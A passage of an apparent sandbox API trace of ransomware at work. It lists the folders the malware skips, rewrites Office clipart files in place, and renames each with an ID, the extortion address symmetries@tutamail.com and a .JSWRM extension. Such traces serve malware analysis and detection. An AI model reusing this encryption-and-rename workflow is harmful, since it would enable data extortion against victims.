(lpString1="BL00265_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.009] lstrcmpiW (lpString1="BL00265_.WMF", lpString2="system volume information") returned -1 [0075.009] lstrcmpiW (lpString1="BL00265_.WMF", lpString2="msocache") returned -1 [0075.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0075.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00265_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00265_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00265_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0075.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0075.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00265_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00265_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00265_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0075.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.010] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5752) returned 1 [0075.010] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1670) returned 0x24c1d0 [0075.010] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1670, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1670, lpOverlapped=0x0) returned 1 [0075.013] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.013] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1670, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1670, lpOverlapped=0x0) returned 1 [0075.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.013] CloseHandle (hObject=0x460) returned 1 [0075.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0075.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0075.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0075.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0075.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0075.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.013] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0075.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.014] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00267_.WMF", cAlternateFileName="")) returned 1 [0075.014] lstrcmpiW (lpString1="BL00267_.WMF", lpString2=".") returned 1 [0075.014] lstrcmpiW (lpString1="BL00267_.WMF", lpString2="..") returned 1 [0075.014] lstrcmpiW (lpString1="BL00267_.WMF", lpString2="...") returned 1 [0075.014] lstrcmpiW (lpString1="BL00267_.WMF", lpString2="windows") returned -1 [0075.014] lstrcmpiW (lpString1="BL00267_.WMF", lpString2="recovery") returned -1 [0075.014] lstrcmpiW (lpString1="BL00267_.WMF", lpString2="perflogs") returned -1 [0075.014] lstrcmpiW (lpString1="BL00267_.WMF", lpString2="documents and settings") returned -1 [0075.014] lstrcmpiW (lpString1="BL00267_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.014] lstrcmpiW (lpString1="BL00267_.WMF", lpString2="system volume information") returned -1 [0075.014] lstrcmpiW (lpString1="BL00267_.WMF", lpString2="msocache") returned -1 [0075.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0075.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00267_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00267_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00267_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0075.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0075.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00267_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00267_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00267_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0075.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.015] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2644) returned 1 [0075.015] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa50) returned 0x23fc98 [0075.015] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xa50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xa50, lpOverlapped=0x0) returned 1 [0075.017] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.017] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xa50, lpOverlapped=0x0) returned 1 [0075.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.017] CloseHandle (hObject=0x460) returned 1 [0075.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0075.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0075.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0075.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0075.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0075.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.017] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0075.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.018] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd5c704c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd5c704c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd5c704c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1498, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00269_.WMF", cAlternateFileName="")) returned 1 [0075.018] lstrcmpiW (lpString1="BL00269_.WMF", lpString2=".") returned 1 [0075.018] lstrcmpiW (lpString1="BL00269_.WMF", lpString2="..") returned 1 [0075.018] lstrcmpiW (lpString1="BL00269_.WMF", lpString2="...") returned 1 [0075.018] lstrcmpiW (lpString1="BL00269_.WMF", lpString2="windows") returned -1 [0075.018] lstrcmpiW (lpString1="BL00269_.WMF", lpString2="recovery") returned -1 [0075.018] lstrcmpiW (lpString1="BL00269_.WMF", lpString2="perflogs") returned -1 [0075.018] lstrcmpiW (lpString1="BL00269_.WMF", lpString2="documents and settings") returned -1 [0075.018] lstrcmpiW (lpString1="BL00269_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.018] lstrcmpiW (lpString1="BL00269_.WMF", lpString2="system volume information") returned -1 [0075.018] lstrcmpiW (lpString1="BL00269_.WMF", lpString2="msocache") returned -1 [0075.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0075.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00269_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00269_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00269_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0075.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0075.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00269_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00269_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00269_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0075.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.019] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5272) returned 1 [0075.019] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1490) returned 0x24c1d0 [0075.019] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1490, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1490, lpOverlapped=0x0) returned 1 [0075.021] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.021] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1490, lpOverlapped=0x0) returned 1 [0075.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.021] CloseHandle (hObject=0x460) returned 1 [0075.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0075.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0075.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0075.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0075.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0075.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.022] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0075.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.023] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00270_.WMF", cAlternateFileName="")) returned 1 [0075.023] lstrcmpiW (lpString1="BL00270_.WMF", lpString2=".") returned 1 [0075.023] lstrcmpiW (lpString1="BL00270_.WMF", lpString2="..") returned 1 [0075.023] lstrcmpiW (lpString1="BL00270_.WMF", lpString2="...") returned 1 [0075.023] lstrcmpiW (lpString1="BL00270_.WMF", lpString2="windows") returned -1 [0075.023] lstrcmpiW (lpString1="BL00270_.WMF", lpString2="recovery") returned -1 [0075.023] lstrcmpiW (lpString1="BL00270_.WMF", lpString2="perflogs") returned -1 [0075.023] lstrcmpiW (lpString1="BL00270_.WMF", lpString2="documents and settings") returned -1 [0075.023] lstrcmpiW (lpString1="BL00270_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.023] lstrcmpiW (lpString1="BL00270_.WMF", lpString2="system volume information") returned -1 [0075.023] lstrcmpiW (lpString1="BL00270_.WMF", lpString2="msocache") returned -1 [0075.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0075.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00270_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00270_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00270_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0075.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0075.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00270_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00270_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00270_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0075.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 